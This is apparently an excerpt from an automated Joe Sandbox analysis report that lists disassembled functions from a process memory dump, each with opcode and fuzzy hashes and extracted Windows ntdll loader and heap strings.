                                          • Instruction ID: 3a092fe6bf516d5fbbe7fde15f30fe639e63994da52d34ca75f9fe491d90e7ac
                                          • Opcode Fuzzy Hash: 18e6d7a0973fc5d7dcb3672234b4636e337a45c46fccdbf6dbb5548b113e17cc
                                          • Instruction Fuzzy Hash: 7541CEB5544311EBC731FB68DC44BAB77E9EB59B60F00892EFA4997250E770D800CBA6
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0170C1C5
                                          • @, xrefs: 0170C1F1
                                          • PreferredUILanguages, xrefs: 0170C212
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: f27b6e2da8a20a6fc530589ed88bbb8ea2fb2552891bc6af0c2f7f998e7dd5f3
                                          • Instruction ID: e4d44f257f7f51532806f0491cadcab56dfdc82c8cd8ec5ed8064d09b4a47254
                                          • Opcode Fuzzy Hash: f27b6e2da8a20a6fc530589ed88bbb8ea2fb2552891bc6af0c2f7f998e7dd5f3
                                          • Instruction Fuzzy Hash: 7A417171E04319EBDF12DAD8CC91BEEFBFDAB18704F1041AAE609A7680D7749A448B54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: 9efd14f3c52871d45a2474f84c5363793d326bfba2ef4f9f870cc5e93b8b16c2
                                          • Instruction ID: b40816d273a82b5a2800af6deabca28b130a9d0df55e7468579c044d2cdce0bc
                                          • Opcode Fuzzy Hash: 9efd14f3c52871d45a2474f84c5363793d326bfba2ef4f9f870cc5e93b8b16c2
                                          • Instruction Fuzzy Hash: CD41E272A022588FEB25DBA9CC58BADBBF9FF55340F14065ADA01EB781DB359901CB10
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016D4888
                                          • LdrpCheckRedirection, xrefs: 016D488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 016D4899
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: 2b7a2b5c6b6289b6af8dc2cc3d7e81d16469d1c78302694de003bbd1fd37ec21
                                          • Instruction ID: bc5412cdb793e5e452a28446b936a2c08d889da0fc24246bbe608c1b51ace98e
                                          • Opcode Fuzzy Hash: 2b7a2b5c6b6289b6af8dc2cc3d7e81d16469d1c78302694de003bbd1fd37ec21
                                          • Instruction Fuzzy Hash: 3E419032E046519BCB21CE58DC41A267BE9EF89A90F07056DED89E7B51DB30DC00CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 68de6135c3d0febc2bfd0345b9c072f9b01c696fa5becb495af9ee19c91afde1
                                          • Instruction ID: 1ae819a38a8203b858b2f7ee6dd56154edc9b990cc7384d31d616c1806d98365
                                          • Opcode Fuzzy Hash: 68de6135c3d0febc2bfd0345b9c072f9b01c696fa5becb495af9ee19c91afde1
                                          • Instruction Fuzzy Hash: 71119D353161429FDB29DA28CC85BAAB3A9EF41715F18C16EF4078B291DB38D881CB55
                                          Strings
                                          • Process initialization failed with status 0x%08lx, xrefs: 016D20F3
                                          • LdrpInitializationFailure, xrefs: 016D20FA
                                          • minkernel\ntdll\ldrinit.c, xrefs: 016D2104
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: abcbe83f51c669f3d4c00a36c715abf852cad38bead6cf68a4afa6f661645750
                                          • Instruction ID: 52ab0d6e5747915831d28cbaca5d957f3e9b2756e5809330d19c708ead14f634
                                          • Opcode Fuzzy Hash: abcbe83f51c669f3d4c00a36c715abf852cad38bead6cf68a4afa6f661645750
                                          • Instruction Fuzzy Hash: CAF02278A40318ABE720EA4CCC62FAA3B68EB80B24F10405DFB4467281D7B0A940CA80
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 78b6d18e340489a70238d77f55548882ed3c334dcf39e747ae8b990da83981fc
                                          • Instruction ID: 96e0cf5d6b3405053ee7333b77eabb242744e08a3a6254442d86012e730fbb0f
                                          • Opcode Fuzzy Hash: 78b6d18e340489a70238d77f55548882ed3c334dcf39e747ae8b990da83981fc
                                          • Instruction Fuzzy Hash: 58713672A0014A9FDB11DFA8CD90AAEB7F9EF18744F144069E905A7352EB34A941CBA4
                                          Strings
                                          • LdrResSearchResource Enter, xrefs: 0165AA13
                                          • LdrResSearchResource Exit, xrefs: 0165AA25
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: e38cc07194ffc46bb7f493d0761d730a0c505eb259ed48b07357cf7c809f0977
                                          • Instruction ID: 45e6d29485dfc4d0106a110a20e705c35651097f1f320fb4bd119f24e411588c
                                          • Opcode Fuzzy Hash: e38cc07194ffc46bb7f493d0761d730a0c505eb259ed48b07357cf7c809f0977
                                          • Instruction Fuzzy Hash: 47E15E71A00219ABEB62CEDDCD94BEEBBBABF44310F14462AED01E7351D7749981CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: 8dd8dea7965882754346ae62f69db568e63a01cb19f5b3e7ab4e4cbd6b97d51b
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 68C1C0312053829BEB25CF2CC845B6BFBE5AFC4318F184A2DFA968B299D774D505CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 6be958a5d261290e3b6ea83f84b6dc6b33c31e9081167572059441b301979a2c
                                          • Instruction ID: 4f3d44c67c274fdf5991ce5181aee0cba0308fe5e8ee2c3c8b42c1be3da3db84
                                          • Opcode Fuzzy Hash: 6be958a5d261290e3b6ea83f84b6dc6b33c31e9081167572059441b301979a2c
                                          • Instruction Fuzzy Hash: 63612A71E016199FDB24DFA88D40ABEBBB9FB48B00F15406DE649EB251D732A901CB54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: dc57c6ac5b20a25dc6c32c2a04b500c518f0cd458b8b598c1d329cc56fbbfda8
                                          • Instruction ID: 0d4a18670e43b67a64b23cdcc4fc07ef7e76b9bf2a3a8ada4a5266280eb04efa
                                          • Opcode Fuzzy Hash: dc57c6ac5b20a25dc6c32c2a04b500c518f0cd458b8b598c1d329cc56fbbfda8
                                          • Instruction Fuzzy Hash: 02511671E0121DAFDF11DFA9CC94AEFBBBDEB44654F10052DEA11B7680DB309A058BA4
                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0165063D
                                          • kLsE, xrefs: 01650540
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: 2b8b10ce260b3597cf250d20dcfd2ca20fd8af5084877dad8421e6dac9fdce6c
                                          • Instruction ID: 146a932f67f0b7299cec4d0906d7dcb6299c1e9fe2eaa7a1b599fc8b4a1eb98c
                                          • Opcode Fuzzy Hash: 2b8b10ce260b3597cf250d20dcfd2ca20fd8af5084877dad8421e6dac9fdce6c
                                          • Instruction Fuzzy Hash: 6551CFB15047428FD764DF68C9406A7BBE8AF85304F10883EFA9A87341E770D545CFA6
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0165A2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0165A309
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 17df793beaf747154a36b817f31a5b0cca06bf2351f507d4081398a34b780ebd
                                          • Instruction ID: 61a46f7e51ac059170cb74f6fa2d786a27f8b06b7c17aa035da15aa4cecdd508
                                          • Opcode Fuzzy Hash: 17df793beaf747154a36b817f31a5b0cca06bf2351f507d4081398a34b780ebd
                                          • Instruction Fuzzy Hash: DF41AB31A00655DBDB218F99CC90BAA7BF5FF84308F1441A9ED05DB392E7B5D941CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: d031f209a849cf23fe753327a73df7ad71ebf35785cc381712eb8688f466b0e3
                                          • Instruction ID: daf0c84370f54f6d61db35326d83ee6b3f726df6af596bdb2549b048a471b390
                                          • Opcode Fuzzy Hash: d031f209a849cf23fe753327a73df7ad71ebf35785cc381712eb8688f466b0e3
                                          • Instruction Fuzzy Hash: 8301D1B2651740AFD321EF54CD45B2677E8E785729F008A3EFA49C7194E334D844CB4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 2196c9bfc081e779619094edbdc20bb77fea6e7527570082df2736b5ce12398c
                                          • Instruction ID: 347eb721ece3e7481a75be151f125a79f1bd0b8c3de0706535cd847e3adf7d66
                                          • Opcode Fuzzy Hash: 2196c9bfc081e779619094edbdc20bb77fea6e7527570082df2736b5ce12398c
                                          • Instruction Fuzzy Hash: 6B824A75E003198BEB65CFA9CC80BEDBBB5BF48350F148169DD19AB391D7309982CB54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 559b667180bb4d758bb39fd9f1036c1ee87923066ea9910d9bbb4b94673ca253
                                          • Instruction ID: ad0b3d28178cc3680ff2302f3409ccce7a83118456aae62e12850d8fac3d1f6e
                                          • Opcode Fuzzy Hash: 559b667180bb4d758bb39fd9f1036c1ee87923066ea9910d9bbb4b94673ca253
                                          • Instruction Fuzzy Hash: 91918571D01219AFEB21DF95CD85FAEBBB9EF14750F104059F600AB291D774AD00CBA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: b68b6f7632ba549e85dab542a55fb75d866b047eb2ac7e3a9b4f2afe27a23a6e
                                          • Instruction ID: 5d4d4b7be584f273356f5c3f87e7a48d61b215f3bf20a8946655ae53f11440a6
                                          • Opcode Fuzzy Hash: b68b6f7632ba549e85dab542a55fb75d866b047eb2ac7e3a9b4f2afe27a23a6e
                                          • Instruction Fuzzy Hash: 5A91A132901609AFDB22ABA5DC44FAFBF7AEF45744F11001DF605A7260EB369902CB55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: c1918871aa0c9df7b773d35502d2c690889fbe3db6eadf56cde6e12112fe4d62
                                          • Instruction ID: 9b61f02561f2dbe348bdb3baa06586f9de8ee473f8ee427565ebb03ae3af9f4c
                                          • Opcode Fuzzy Hash: c1918871aa0c9df7b773d35502d2c690889fbe3db6eadf56cde6e12112fe4d62
                                          • Instruction Fuzzy Hash: E3716FB5E0121A9FDF24DF98C9906BDBBB2FF48B10F14852EE905A7341E7349841CB68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          • Opcode ID: e8983d5580f175fe22e75e4466535d176ff1628dce46ce29476e4ffe33946ac2
                                          • Instruction ID: 1148b786d3d248451c74c1e269bfb65419f1518fd908dbe6f26c1ba5fcb70993
                                          • Opcode Fuzzy Hash: e8983d5580f175fe22e75e4466535d176ff1628dce46ce29476e4ffe33946ac2
                                          • Instruction Fuzzy Hash: 5E519F72D0022A9BDB10DF9DDC40AAFBBB5AF44A50F05416EEE12BB744DB349805CFA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: a432a346d1159f0a2245aff8330fc8d5da754bc183681a81386ada8fcfda5b40
                                          • Instruction ID: 0563cecb7f883da6dca4164c2212d0c84f3614922196504dfb5c4174b80ef5d4
                                          • Opcode Fuzzy Hash: a432a346d1159f0a2245aff8330fc8d5da754bc183681a81386ada8fcfda5b40
                                          • Instruction Fuzzy Hash: 9E41B376518352ABD710DA79CC40B6BBBEDAF88704F04092DFA85D7280E779D904C796
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 7ccb3263fa460a552c8457eaf9dad4e8574ac9899448ef370fd16684021a0acb
                                          • Instruction ID: 382ae2d7f280dc2197efcaa344f0a6f210c6842aea1e1dbfe8ef2f06e2e55917
                                          • Opcode Fuzzy Hash: 7ccb3263fa460a552c8457eaf9dad4e8574ac9899448ef370fd16684021a0acb
                                          • Instruction Fuzzy Hash: 954130B1D0152DABDF219A50CC84FEFB77DEB45714F0145EDEA08AB140DB709E898BA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: ee74b9717e78d22382eefb35b347d928adcd232258c7cac8c9b470920225541a
                                          • Instruction ID: e3b178ecbd141904c6a0e1998c9231ecefb8cc7144d88b4544625c37d726923c
                                          • Opcode Fuzzy Hash: ee74b9717e78d22382eefb35b347d928adcd232258c7cac8c9b470920225541a
                                          • Instruction Fuzzy Hash: F0314831A017099BEB22CB69CC48BAE7BE8DF25B04F10416CE941AB382DB75D815CB54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 9c49bc53c402a667a4283eb37add7cc9697827dad3c21a8fb86ca6eaacbcad8b
                                          • Instruction ID: 223c200e744e07e8a4ee49141265fa8371a8bacc96c01e682d41647aadf53359
                                          • Opcode Fuzzy Hash: 9c49bc53c402a667a4283eb37add7cc9697827dad3c21a8fb86ca6eaacbcad8b
                                          • Instruction Fuzzy Hash: 26310336900519AFEB15DA98CC55E7FBBB8EB80B20F01416DE909A7250D730AE01EBE0
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016D895E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 07d16d78791f25c226c32fd924440f63c13c8115d7c5193de15818ea8af82f1a
                                          • Instruction ID: b29d316519ac098a2e33a543dafb37abdc5714e0fea3d081893aaf8af821e695
                                          • Opcode Fuzzy Hash: 07d16d78791f25c226c32fd924440f63c13c8115d7c5193de15818ea8af82f1a
                                          • Instruction Fuzzy Hash: 46012B75A04301AFE7346F5DCC88E5ABB6AEF85264F04002DF6811B652CB20A841C796
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09f0d190850da057b76ba89c69c7ce7596cb2c55d92d9288fa5155fe70701a18
                                          • Instruction ID: 87944be4eb43b611ff402c6bffc0848e81c1c29da7be29daf0cc87aee3da819f
                                          • Opcode Fuzzy Hash: 09f0d190850da057b76ba89c69c7ce7596cb2c55d92d9288fa5155fe70701a18
                                          • Instruction Fuzzy Hash: F342BF766083419BE725CF68CCA0A6BBBE6BB88700F49492DFB9287350D771D845CF52
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afd498539668ed1d11ab634c3f067143c808896bb79075a406699e62a927fb9a
                                          • Instruction ID: 01ca721160edc66f6e0b39ef22e0237cac3942e5f17ab2a8ef38bdf0081291dc
                                          • Opcode Fuzzy Hash: afd498539668ed1d11ab634c3f067143c808896bb79075a406699e62a927fb9a
                                          • Instruction Fuzzy Hash: 21426B75A012198FEB25CF69CC85BADBBFABF48300F148199E949EB342D7349985CF50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8848439b5f85f45d5999ff513be302b224bac3fa8c899bb57ef1603d21e36664
                                          • Instruction ID: e87d432c25a13fe40fe857d012b2c1c0c42dc24ebca0d45f9c93434377325914
                                          • Opcode Fuzzy Hash: 8848439b5f85f45d5999ff513be302b224bac3fa8c899bb57ef1603d21e36664
                                          • Instruction Fuzzy Hash: 5232AB70A007568BEB25CF69CC947BEBBF6BF84304F24811DD58A9B385D735A886CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9310bb9ed6f981778e57961f2f03c21bdbb77d1794385c49ec8ad0474e70276f
                                          • Instruction ID: 3378a9169b99190d883e7b869b67856035b602a25db286279ce9f50871858194
                                          • Opcode Fuzzy Hash: 9310bb9ed6f981778e57961f2f03c21bdbb77d1794385c49ec8ad0474e70276f
                                          • Instruction Fuzzy Hash: 5F22CE742046618BEB25CFADC894772BBF1AF45340F18855EEB8A8F386D735E452CB60
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: faab9e609e5fd43bf6bc61d0cbc50b868d36b2ce011ccff62ee609a0fc0e00ea
                                          • Instruction ID: 989f8fc1e66c1c721c3aa54ac97df69df39db8e6bb72a32a8ee1a5b459eb1e5b
                                          • Opcode Fuzzy Hash: faab9e609e5fd43bf6bc61d0cbc50b868d36b2ce011ccff62ee609a0fc0e00ea
                                          • Instruction Fuzzy Hash: B332EF71A01205DFDB65CF68D890BAEBBF1FF48300F548569E956AB391D734E882CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 542de420ae941d3f9e2e4a6b76b859a5bdacbf492e1c1c6b4443b19df30687f3
                                          • Instruction ID: 2870f68824c1b8b9a14b217280bdb5145746eb424c161519972dfd18c82732cd
                                          • Opcode Fuzzy Hash: 542de420ae941d3f9e2e4a6b76b859a5bdacbf492e1c1c6b4443b19df30687f3
                                          • Instruction Fuzzy Hash: 6ED1F171E0160A8BDF15CF6CCC45AFEB7FAAF88314F188269D955A7241E735E9028B60
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a0da17f3afb39f0f96f313c0645cbdefe19c9c13be021bb61392f98b728c0fa
                                          • Instruction ID: 91f6fff8e41ec21f5e60d64690c8d591c91e71df0fbc9ec65f94e00629b64b3f
                                          • Opcode Fuzzy Hash: 7a0da17f3afb39f0f96f313c0645cbdefe19c9c13be021bb61392f98b728c0fa
                                          • Instruction Fuzzy Hash: B8E1AF71508342CFC755CF28C890A6ABBF1FF89314F458A6DE99587351DB31E906CB92
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a48d6ca306de33c85aa9905ecf95fdc8808aaafb11b1f247ad1affae29cd272
                                          • Instruction ID: 67590661c659dcb865f9a224a134cb97f0e66902dbe64ac1489bd738dd61534d
                                          • Opcode Fuzzy Hash: 8a48d6ca306de33c85aa9905ecf95fdc8808aaafb11b1f247ad1affae29cd272
                                          • Instruction Fuzzy Hash: B4D10271A00216DBDB14DFA8CC90ABEB7FABF55304F05862DE916DB281E734E951CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction ID: 29878f85632fc4f5ee85ecf32f91d566e3ac140ddeff872e6ccacbca4dc0c60f
                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction Fuzzy Hash: 00B17174E006069FDB24DFA9CD48AABBBBEBF84314F10845DEA0297794DB34E905CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 41c2225893e5431a54a37dc5b8c1a451b2898a7a34a2777544663a98b0c6bc54
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: D9B1E871604646AFDB25DB68CD90BBEBBFAAF84300F144169E656D7382DB30ED81CB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1620000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 571aa26425d008169f7a622185e7601fa889c4111c9ebfce53c833b0e3cc92e2
                                          • Instruction ID: 314a06b114bb8680a82fec17c6ff17e1417dec380e9297802f737ba77e312c51
